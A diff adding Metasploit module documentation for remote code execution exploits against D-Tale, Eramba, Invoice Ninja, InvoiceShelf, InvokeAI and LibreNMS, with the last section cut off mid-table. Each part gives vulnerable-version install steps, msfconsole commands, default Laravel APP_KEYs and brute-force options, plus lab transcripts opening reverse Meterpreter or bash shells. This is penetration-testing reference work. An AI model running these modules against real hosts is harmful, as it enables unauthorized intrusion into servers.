+An attacker can override global state to enable custom filters, which then facilitates remote code execution.
+Specifically, this vulnerability leverages the ability to manipulate global application settings
+to activate the enable_custom_filters feature, typically restricted to trusted environments.
+Once enabled, the /test-filter endpoint of the Custom Filters functionality can be exploited to execute arbitrary system commands.
+
+The vulnerability affects:
+
+    * D-Tale <= 3.15.1
+
+This module was successfully tested on:
+
+    * D-Tale 3.15.1 installed on Ubuntu 24.04
+    * D-Tale 3.12.0 installed on Ubuntu 22.04
+    * D-Tale 3.10.0 installed on Ubuntu 22.04
+    * D-Tale 3.0.0 installed on Ubuntu 22.04
+    * D-Tale 2.5.1 installed on Ubuntu 22.04
+    * D-Tale 2.4.0 installed on Ubuntu 22.04
+
+
+### Installation
+
+1. `pip install 'dtale==3.15.1'`
+
+2. `dtale --host 0.0.0.0`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/dtale_rce_cve_2025_0655`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/dtale_rce_cve_2025_0655
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > options
+
+Module options (exploit/linux/http/dtale_rce_cve_2025_0655):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    40000            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      agAyokIhdJZ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 3.15.1 detected.
+[*] Use data_id: 1
+[*] Updated the enable_custom_filters to true.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33210) at 2025-03-03 20:49:53 +0900
+[*] Successfully executed the payload.
+[*] Successfully cleaned up data_id: 1
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-52-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,157 @@
+## Vulnerable Application
+
+Eramba is open and free GRC software, used by many companies. It offer mainly risk management solution. Version up to 3.19.1 is vulnerable to authenticated remote command execution. It is neccessary to provide valid credentials. The application allows to execute arbitrary OS commands, which can lead to remote access. Application is available in [Docker format](https://www.eramba.org/learning/courses/12/episodes/274). However, after installation, debug mode needs to be enabled. Here's modified Docker compose file for simpler testing (`docker-compose.simple-install.yml`):
+
+### Installation
+
+Docker and docker-compose is required.
+
+1. git clone https://github.com/eramba/docker
+2. cd docker
+3. Setup database credentials and public URL in `.env`
+4. Copy following into `docker-compose.simple-install.yml` 
+```
+version: '3.19'
+services:
+  mysql:
+    container_name: mysql
+    image: mysql:8.0.28-oracle
+    command: ["mysqld", "--disable-log-bin"]
+    restart: always
+    volumes:
+      - db-data:/var/lib/mysql
+      - ./mysql/conf.d:/etc/mysql/conf.d
+      - ./mysql/entrypoint:/docker-entrypoint-initdb.d
+    environment:
+      MYSQL_DATABASE: ${DB_DATABASE}
+      MYSQL_USER: ${DB_USERNAME}
+      MYSQL_PASSWORD: ${DB_PASSWORD}
+      MYSQL_ROOT_PASSWORD: ${MYSQL_ROOT_PASSWORD}
+  redis:
+    container_name: redis
+    image: redis:6.0.16-alpine
+    restart: always
+  eramba:
+    container_name: eramba
+    image: ghcr.io/eramba/eramba:3.19.1
+    restart: always
+    ports:
+      - 8443:443
+    volumes:
+      - data:/var/www/eramba/app/upgrade/data
+      - app:/var/www/eramba
+      - logs:/var/www/eramba/app/upgrade/logs
+      - ./apache/ssl/mycert.crt:/etc/ssl/certs/mycert.crt
+      - ./apache/ssl/mycert.key:/etc/ssl/private/mycert.key
+      - ./apache/security.conf:/etc/apache2/conf-available/security.conf
+      - ./apache/ports.conf:/etc/apache2/ports.conf
+      - ./apache/vhost-ssl.conf:/etc/apache2/sites-available/000-default.conf
+      - ./crontab/crontab:/etc/cron.d/eramba-crontab
+    environment:
+      DB_HOST: ${DB_HOST}
+      DB_DATABASE: ${DB_DATABASE}
+      DB_USERNAME: ${DB_USERNAME}
+      DB_PASSWORD: ${DB_PASSWORD}
+      CACHE_URL: ${CACHE_URL}
+      USE_PROXY: ${USE_PROXY}
+      PROXY_HOST: ${PROXY_HOST}
+      PROXY_PORT: ${PROXY_PORT}
+      USE_PROXY_AUTH: ${USE_PROXY_AUTH}
+      PROXY_AUTH_USER: ${PROXY_AUTH_USER}
+      PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
+      PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
+      DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
+      LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
+    links:
+      - mysql
+      - redis
+    depends_on:
+      - mysql
+  cron:
+    container_name: cron
+    image: ghcr.io/eramba/eramba:3.19.1
+    command: ["cron", "-f"]
+    entrypoint: ["/docker-cron-entrypoint.sh"]
+    restart: always
+    volumes:
+      - data:/var/www/eramba/app/upgrade/data
+      - app:/var/www/eramba
+      - logs:/var/www/eramba/app/upgrade/logs
+      - ./docker-cron-entrypoint.sh:/docker-cron-entrypoint.sh
+      - ./crontab/crontab:/etc/cron.d/eramba-crontab
+      - .env:/var/www/docker.env
+    environment:
+      DB_HOST: ${DB_HOST}
+      DB_DATABASE: ${DB_DATABASE}
+      DB_USERNAME: ${DB_USERNAME}
+      DB_PASSWORD: ${DB_PASSWORD}
+      CACHE_URL: ${CACHE_URL}
+      USE_PROXY: ${USE_PROXY}
+      PROXY_HOST: ${PROXY_HOST}
+      PROXY_PORT: ${PROXY_PORT}
+      USE_PROXY_AUTH: ${USE_PROXY_AUTH}
+      PROXY_AUTH_USER: ${PROXY_AUTH_USER}
+      PROXY_AUTH_PASS: ${PROXY_AUTH_PASS}
+      PUBLIC_ADDRESS: ${PUBLIC_ADDRESS}
+      DOCKER_DEPLOYMENT: ${DOCKER_DEPLOYMENT}
+      LDAPTLS_REQCERT: ${LDAPTLS_REQCERT}
+    links:
+      - mysql
+      - redis
+      - eramba
+    depends_on:
+      - eramba
+volumes:
+  app:
+  data:
+  logs:
+  db-data:
+```
+
+5. `docker compose -f docker-compose.simple-install.yml up -d`
+
+Shut down: `docker compose -f docker-compose.simple-install.yml down`
+
+
+## Verification Steps
+
+1. use exploit/linux/http/eramba_rce
+2. set RHOSTS [target IP]
+3. set LHOST [attacker's IP]
+4. set USERNAME [username]
+5. set PASSWORD [password]
+6. exploit
+
+## Options
+
+### USERNAME
+
+A valid username for Eramba application
+
+### PASSWORD 
+
+A valid password for Eramba application
+
+## Scenarios
+
+```
+msf6 > use exploit/linux/http/eramba_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/eramba_rce)> set RHOSTS 192.168.95.145
+RHOSTS => 192.168.95.145
+msf6 exploit(linux/http/eramba_rce)> set LHOST 192.168.95.142
+LHOST => 192.168.95.142
+msf6 exploit(linux/http/eramba_rce)> set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/eramba_rce)> set PASSWORD P4ssw0rd!
+PASSWORD => P4ssw0rd!
+msf6 exploit(linux/http/eramba_rce) > exploit
+[*] Started reverse TCP handler on 192.168.95.142:4444 
+[*] Command shell session 1 opened (192.168.95.142:4444 -> 192.168.95.145:38460) at 2025-03-13 12:31:26 +0100
+id
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+```
+
@@ -0,0 +1,112 @@
+## Vulnerable Application
+Invoice Ninja is a free invoicing software for small businesses, based on the PHP framework Laravel.
+A Remote Code Execution vulnerability in Invoice Ninja (>= `5.8.22` <= `5.10.10`) allows remote unauthenticated
+attackers to conduct PHP deserialization attacks via endpoint `/route/<hash>` which accepts a Laravel
+ciphered value which is unsafe unserialized, if an attacker has access to the secret `APP_KEY`.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+to sensitive information.
+
+The following release was tested.
+* Invoice Ninja `5.10.10` on Ubuntu 22.04
+
+## Installation steps to install Invoice Ninja on a self-hosted platform
+`wget https://github.com/invoiceninja/dockerfiles/archive/refs/tags/5.8.22.zip`
+
+`unzip 5.8.22.zip`
+
+`cd dockerfiles-5.8.22`
+
+Replace inside `docker-compose.yml`
+
+FROM `image: invoiceninja/invoiceninja:5` TO `image: invoiceninja/invoiceninja:5.8.22`
+
+Replace in `env`
+`APP_KEY=base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=`
+
+Then, execute `docker-compose up`
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/linux/http/invoiceninja_uauth_rce_cve_2024_55555`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+### APP_KEY
+This option is required if the BRUTE_FORCE option is not used.
+It is the Laravel APP_KEY with a default key: `base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=`.
+
+### BRUTEFORCE
+This option is optional and is a text file with a list of APP_KEYs, one per line for a bruteforce attack.
+
+## Scenarios
+### Invoice Ninja 5.10.10 on Ubuntu 22.04 -  PHP Command target
+Attack scenario: use the default Laravel APP_KEY preset in the option APP_KEY.
+```msf
+msf6 > use modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set rhosts 192.168.201.6
+rhosts => 192.168.201.6
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. Invoice Ninja 5.10.10
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.
+[*] Grabbing the cookie with the XSRF-TOKEN.
+[+] APP_KEY is valid: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
+[+] Unciphered value: e60eab8287b88f834312505e582750ae6f95a84b|6IWTnJv2f3lL1nbKRbl6LwJixPeRF5grQVTFTIuB
+[*] Generate an encrypted serialization payload with our cracked APP_KEY.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.6
+[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.6:60120) at 2025-02-23 09:47:28 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
+Meterpreter : php/linux
+meterpreter > pwd
+/usr/share/nginx/invoiceninja/public
+meterpreter >
+```
+###  Invoice Ninja 5.10.10 on Ubuntu 22.04 - Unix/Linux Command target
+Attack scenario: use the BRUTEFORCE option with a list of APP_KEYS in a text file.
+```msf
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set target 1
+target => 1
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > set BRUTEFORCE /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt
+BRUTEFORCE => /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt
+msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.6:443 can be exploited.
+[+] The target appears to be vulnerable. Invoice Ninja 5.10.10
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.
+[*] Grabbing the cookie with the XSRF-TOKEN.
+[*] Starting bruteforce decryption with APP_KEYS listed in /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt.
+[+] APP_KEY is valid: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
+[+] Unciphered value: e60eab8287b88f834312505e582750ae6f95a84b|3epElAO1qNeckBzHOytBrNnGrvRJSyeCBsahBkSO
+[*] Generate an encrypted serialization payload with our cracked APP_KEY.
+[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
+[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.6:60340) at 2025-02-23 09:49:15 +0000
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+uname -a
+Linux cuckoo 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/usr/share/nginx/invoiceninja/public
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,186 @@
+## Vulnerable Application
+InvoiceShelf is an open-source web & mobile app that helps you track expenses, payments, create professional
+invoices & estimates and is based on the PHP framework Laravel.
+InvoiceShelf has a Remote Code Execution vulnerability that allows remote unauthenticated attackers to conduct
+PHP deserialization attacks. This is possible when the `SESSION_DRIVER=cookie` option is set on the default
+InvoiceShelf .env file meaning that any session will be stored as a ciphered value inside a cookie.
+These sessions are made from a specially crafted JSON containing serialized data which is then ciphered using
+Laravel's encrypt() function.
+An attacker in possession of the `APP_KEY` would therefore be able to retrieve the cookie, uncipher it and modify
+the serialized data in order to get arbitrary deserialization on the affected server, allowing them to achieve
+remote command execution. InvoiceShelf version `1.3.0` and lower is vulnerable.
+As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
+potentially resulting in complete system compromise, data exfiltration, or unauthorized access
+to sensitive information.
+
+The following release was tested.
+* InvoiceShelf `1.3.0` on Docker
+
+## Installation steps to install InvoiceShelf on Docker
+* Follow the instructions [here](https://docs.invoiceshelf.com/installation.html) for docker or manual install.
+* Please ensure that `SESSION_DRIVER=cookie` is set to cookie.
+* cp `.env.example` to `.env` and note down the `APP_KEY` setting.
+* To make life easy, use the `docker-compose.yml` below to install a vulnerable InvoiceShell on Docker.
+```
+ #-------------------------------------------
+ # InvoiceShelf MySQL docker-compose variant
+ # Repo : https://github.com/InvoiceShelf/docker
+ #-------------------------------------------
+
+services:
+  invoiceshelf_db:
+    container_name: invoiceshelf_db
+    image: mariadb:10
+    environment:
+      - MYSQL_DATABASE=invoiceshelf
+      - MYSQL_USER=invoiceshelf
+      - MYSQL_PASSWORD=Passw0rd
+      - MARIADB_ALLOW_EMPTY_ROOT_PASSWORD=true
+    expose:
+      - 3306
+    volumes:
+      - mysql:/var/lib/mysql
+    networks:
+      - invoiceshelf
+    restart: unless-stopped
+    healthcheck:
+      test: ["CMD", "mariadb-admin" ,"ping", "-h", "localhost"]
+      timeout: 20s
+      retries: 10
+
+  invoiceshelf:
+    image: invoiceshelf/invoiceshelf:1.3.0
+    container_name: invoiceshelf
+    ports:
+      - 90:80
+    volumes:
+      - ./invoiceshelf_mysql/data:/data
+      - ./invoiceshelf_mysql/conf:/conf
+    networks:
+      - invoiceshelf
+    environment:
+      # PHP timezone e.g. PHP_TZ=America/New_York
+      - PHP_TZ=UTC
+      - TIMEZONE=UTC
+      - APP_NAME=Laravel
+      - APP_ENV=local
+      - APP_DEBUG=true
+      - APP_URL=http://localhost:90
+      - DB_CONNECTION=mysql
+      - DB_HOST=invoiceshelf_db
+      - DB_PORT=3306
+      - DB_DATABASE=invoiceshelf
+      - DB_USERNAME=invoiceshelf
+      - DB_PASSWORD=Passw0rd
+      - DB_PASSWORD_FILE=
+      - CACHE_STORE=file
+      - SESSION_DRIVER=cookie
+      - SESSION_LIFETIME=1440
+      - SESSION_ENCRYPT=false
+      - SESSION_PATH=/
+      - SESSION_DOMAIN=localhost
+      - SANCTUM_STATEFUL_DOMAINS=localhost:90
+      - STARTUP_DELAY=
+      #- MAIL_DRIVER=smtp
+      #- MAIL_HOST=smtp.mailtrap.io
+      #- MAIL_PORT=2525
+      #- MAIL_USERNAME=null
+      #- MAIL_PASSWORD=null
+      #- MAIL_PASSWORD_FILE=<filename>
+      #- MAIL_ENCRYPTION=null
+    restart: unless-stopped
+    depends_on:
+      - invoiceshelf_db
+
+networks:
+  invoiceshelf:
+
+volumes:
+  mysql:
+```
+* Execute `docker-compose up -d`
+* You can access the InvoiceShelf application at http://localhost:90
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <attacker-ip>`
+- [ ] `set target <0=PHP Command, 1=Unix/Linux Command>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+### APP_KEY
+This option is required if the BRUTE_FORCE option is not used.
+It is the Laravel APP_KEY with a default key: `base64:kgk/4DW1vEVy7aEvet5FPp5un6PIGe/so8H0mvoUtW0=`.
+
+### BRUTEFORCE
+This option is optional and is a text file with a list of APP_KEYs, one per line for a bruteforce attack.
+
+## Scenarios
+### InvoiceShelf 1.3.0 on Docker -  PHP Command target
+Attack scenario: use the default Laravel APP_KEY preset in the option APP_KEY.
+```msf
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set rhosts 192.168.201.21
+rhosts => 192.168.201.21
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.21:90 can be exploited.
+[+] The target appears to be vulnerable. InvoiceShelf 1.3.0
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the cookie.
+[*] Grabbing the cookies.
+[+] APP_KEY is valid: base64:kgk/4DW1vEVy7aEvet5FPp5un6PIGe/so8H0mvoUtW0=
+[+] Unciphered value: f80a79e26a4e80e6829ca82e9323f17dcbf8226b|{"data":"a:3:{s:6:\"_token\";s:40:\"4Fgr0aT0N85gxRmu4PoVqPzHU7XOH23NCrivJO9x\";s:9:\"_previous\";a:1:{s:3:\"url\";s:40:\"http:\/\/192.168.201.21:90\/login?%2Flogin=\";}s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}}","expires":1741454360}
+[*] Generate an encrypted serialized cookie payload with our cracked APP_KEY.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (40004 bytes) to 192.168.201.21
+[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.21:54194) at 2025-03-07 17:19:21 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > pwd
+/var/www/html/InvoiceShelf/public
+meterpreter > sysinfo
+Computer    : 72fe563832ca
+OS          : Linux 72fe563832ca 6.12.5-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 21 10:25:35 UTC 2025 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+###  InvoiceShelf 1.3.0 on Docker - Unix/Linux Command target
+Attack scenario: use the BRUTEFORCE option with a list of APP_KEYS in a text file.
+```msf
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set target 1
+target => 1
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > set BRUTEFORCE /root/laravel-crypto-killer/wordlists/crater.txt
+BRUTEFORCE => /root/laravel-crypto-killer/wordlists/crater.txt
+msf6 exploit(linux/http/invoiceshelf_unauth_rce_cve_2024_55556) > rexploit
+[*] Reloading module...
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.21:90 can be exploited.
+[+] The target appears to be vulnerable. InvoiceShelf 1.3.0
+[*] Lets check if the APP_KEY(s) is/are valid by decrypting the cookie.
+[*] Grabbing the cookies.
+[*] Starting bruteforce decryption with APP_KEYS listed in /root/laravel-crypto-killer/wordlists/crater.txt.
+[+] APP_KEY is valid: base64:kgk/4DW1vEVy7aEvet5FPp5un6PIGe/so8H0mvoUtW0=
+[+] Unciphered value: ce0776f8682b66a8407e6a3d62622642ec8fc685|{"data":"a:3:{s:6:\"_token\";s:40:\"Q2zYE5unWqTpdLwFwqgKxBVubiDI95ceLObsbXXV\";s:9:\"_previous\";a:1:{s:3:\"url\";s:40:\"http:\/\/192.168.201.21:90\/login?%2Flogin=\";}s:6:\"_flash\";a:2:{s:3:\"old\";a:0:{}s:3:\"new\";a:0:{}}}","expires":1741454687}
+[*] Generate an encrypted serialized cookie payload with our cracked APP_KEY.
+[*] Executing Unix/Linux Command for cmd/unix/reverse_bash
+[*] Command shell session 3 opened (192.168.201.8:4444 -> 192.168.201.21:54229) at 2025-03-07 17:24:53 +0000
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(invoiceshelf)
+uname -a
+Linux 72fe563832ca 6.12.5-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 21 10:25:35 UTC 2025 x86_64 GNU/Linux
+pwd
+/var/www/html/InvoiceShelf/public
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,141 @@
+## Vulnerable Application
+
+InvokeAI has a critical vulnerability leading to remote code execution
+in the /api/v2/models/install API through unsafe model deserialization.
+The API allows users to specify a model URL, which is downloaded and loaded server-side using torch.load without proper validation.
+This functionality allows attackers to embed malicious code in model files that execute upon loading.
+
+The vulnerability affects:
+
+    * 4.0.0 <= InvokeAI <= 5.4.2
+
+This module was successfully tested on:
+
+    * InvokeAI 5.3.1 installed on Ubuntu 22.04
+
+
+### Installation
+
+Follow the [official instructions](https://invoke-ai.github.io/InvokeAI/installation/manual/#walkthrough)
+
+1. Install uv:
+
+`curl -LsSf https://astral.sh/uv/install.sh | sh`
+
+2. Create a directory for your installation:
+
+```bash
+mkdir ~/invokeai
+cd ~/invokeai
+```
+
+3. Create a virtual environment in that directory:
+
+`uv venv --relocatable --prompt invoke --python 3.11 --python-preference only-managed .venv`
+
+4. Activate the virtual environment:
+
+`source .venv/bin/activate`
+
+5. Install the invokeai package:
+
+```bash
+uv pip install invokeai==5.3.1 --python 3.11 --python-preference only-managed --index=https://download.pytorch.org/whl/cpu --force-reinstall
+```
+
+6. Deactivate and reactivate your venv so that the invokeai-specific commands become available in the environment:
+
+`deactivate && source .venv/bin/activate`
+
+7. Edit ~/invokeai/invoke.yaml:
+
+```yaml
+  # Internal metadata - do not edit:
+  schema_version: 4.0.2
+  
+  # Put user settings here - see https://invoke-ai.github.io/InvokeAI/features/CONFIGURATION/:
+  host: 0.0.0.0 # serve the app on your local network
+```
+
+8. Run the application, specifying the directory you created earlier as the root directory:
+
+`invokeai-web --root ~/invokeai`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/invokeai_rce_cve_2024_12029`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/invokeai_rce_cve_2024_12029
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/invokeai_rce_cve_2024_12029) > options
+
+Module options (exploit/linux/http/invokeai_rce_cve_2024_12029):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    9090             yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      CdRqUbPlDQJ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               192.168.0.12     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/invokeai_rce_cve_2024_12029) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 5.3.1 detected.
+[*] Using URL: http://192.168.56.1:8081/Z8KmlibT
+[*] Server started.
+[*] Sending stage (3045380 bytes) to 192.168.56.17
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:48294) at 2025-02-16 15:24:41 +0900
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-51-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,122 @@
+## Vulnerable Application
+
+An authenticated attacker can create dangerous directory names on the system and
+alter sensitive configuration parameters through the web portal.
+Those two defects combined then allows to inject arbitrary OS commands inside shell_exec() calls,
+thus achieving arbitrary code execution.
+
+The vulnerability affects:
+
+    * 24.9.0 <= LibreNMS <= 24.9.1
+
+This module was successfully tested on:
+
+    * LibreNMS 24.9.0 installed on Ubuntu 22.04
+    * LibreNMS 24.9.1 installed on Ubuntu 22.04
+
+
+### Installation
+
+1. Follow the [official instructions](https://docs.librenms.org/Installation/Install-LibreNMS/).
+After git clone, change version: `git checkout tags/24.9.1`.
+
+2. Comment out the last line in `/etc/cron.d/librenms`:
+`19 0 * * * librenms /opt/librenms/daily.sh >> /dev/null 2>&1`.
+Otherwise, the version will be updated to the latest, causing the exploit to fail.
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092`
+4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
+5. (Optional) Do: `php artisan device:poll all` on the victim machine or wait up to 5 minutes (default cron setting)
+6. You should get a meterpreter
+
+
+## Options
+### USERNAME (required)
+User name for LibreNMS.
+
+### PASSWORD (required)
+Password for LibreNMS.
+
+### PATH (required)
+LibreNMS installed location. Default is `/opt/librenms`.
+
+### WAIT (required)
+Wait time (seconds) for cron to poll the device. Default is `315`.
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/librenms_authenticated_rce_cve_2024_51092
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/librenms_authenticated_rce_cve_2024_51092) > options
+
+Module options (exploit/linux/http/librenms_authenticated_rce_cve_2024_51092):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD                   yes       Password for LibreNMS
+   PATH      /opt/librenms    yes       LibreNMS installed location
